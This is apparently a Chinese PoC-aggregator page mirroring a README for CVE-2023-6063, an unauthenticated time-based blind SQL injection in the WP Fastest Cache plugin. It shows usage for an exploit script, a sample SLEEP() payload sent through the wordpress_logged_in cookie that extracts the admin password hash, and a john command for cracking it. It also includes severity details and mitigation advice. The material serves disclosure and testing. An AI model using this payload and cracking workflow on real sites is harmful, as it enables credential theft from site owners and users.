关联漏洞
标题:
WordPress plugin WP Fastest Cache 安全漏洞
(CVE-2023-6063)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WP Fastest Cache 1.2.2 版本之前存在安全漏洞,该漏洞源于在 SQL 语句中使用参数之前未正确清理和转义参数,从而导致未经身份验证的用户可利用 SQL 注入。
描述
A Proof on Concept for CVE-2023-6063, a time-based blind SQL injection vulnerability in WP Fastest Cache ≤1.2.2.
介绍
# PoC for CVE-2023-6063: WP Fastest Cache 1.2.2 Unauthenticated Blind SQL Injection
-red)
A Proof on Concept for CVE-2023-6063, a time-based blind SQL injection vulnerability in WP Fastest Cache ≤1.2.2. Extracts hashed passwords (`user_pass`) and emails (`user_email`) from the `wp_users` table by abusing the `wordpress_logged_in` cookie.
## Features
- Time-based data exfiltration (char-by-char) via SLEEP() delays.
- Supports custom cookies, target usernames, and hash validation.
This script extracts:
- ☑️ WordPress password hashes (MD5/PHPass).
- ☑️ Associated email addresses.
- CLI arguments for flexible testing (--just-hash, --just-email, --debug).
### Usage
Install the dependencies (if aren't installed):
~~~ bash
pip install -r requirements.txt
~~~
Basic usage:
~~~
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
~~~
Full options:
~~~
-h, --help show this help message and exit
-u URL, --url URL Full URL to Wordpress for testing CVE-2023-6063
--username USERNAME Define a user to extract its hashed pass
-d DELAY, --delay DELAY
Time for wait web response default 5, minimum 2
-H HASH, --hash HASH Hash to verify against wp_users table, if the hash contains specials characters, please use single quotes -> '<hash>'
--domain DOMAIN Name of the domain for email validation
-c COOKIE, --cookie COOKIE
Specify a cookie name if it's different on your context
--status-code STATUS_CODE
Use a specific positive status code, default 200
--debug More verbosity
--just-hash Just extract hashed password
--just-email Just extract email value for a user
~~~
## 💻 Demo
This is a demo for the admin user
https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890
When hashes passwords are leaked, use `john` or `hashcat` for decrypt it with `PHPass` algorithm if the password is vulnerable.
John example:
~~~ bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
~~~
# 🕵️♂️ Technical Details
## 📖 Vulnerability Decription
The WP Fastest Cache plugin (≤1.2.2) for WordPress is vulnerable to an unauthenticated blind SQL injection via the wordpress_logged_in cookie. Attackers can exploit this flaw to extract sensitive data (e.g., password hashes, email addresses) from the wp_users table by leveraging time-based delays (SLEEP()) in SQL queries.
~~~ sql
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
~~~
🚨 Disclaimer: Use this information only for ethical security testing with proper authorization. Unauthorized exploitation is illegal.
- CVE ID: CVE-2023-6063
- Vulnerability Score: 7.5 (High)
- Vulnerability Type: SQL Injection (Blind, Time-Based)
- Affected Software: WP Fastest Cache (WordPress Plugin) ≤ v1.2.2
## 🔍 Attack Vector
- Exploitability: Remote (No authentication required)
- Attack Complexity: Low (Exploitable via crafted HTTP requests)
## 🔥 Impact:
- Confidentiality: High (Leaks admin credentials)
- Integrity: None
- Availability: None
## 📌 Affected Versions
- WP Fastest Cache versions ≤1.2.2
## 🛡️ Mitigation
Upgrade WP Fastest Cache to version >1.2.2.
- Upgrade to WP Fastest Cache v1.2.3 or later.
- Apply WAF rules to block SQLi payloads in cookies.
- **Disable plugin if unused.**
## 📚 References
- [NIST NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2023-6063)
- [WordPress Plugin Advisory](https://wordpress.org/plugins/wp-fastest-cache/)
- [CVE Details](https://www.cvedetails.com/cve/CVE-2023-6063/)
## ⚖️ Legal
- This script is for educational purposes. Always obtain explicit permission before testing.
文件快照
[4.0K] /data/pocs/e715c2dfe6977c9dfdb0f0c55f13db48cb54c6a2
├── [ 15K] poc.py
├── [3.9K] README.md
└── [ 18] requirements.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。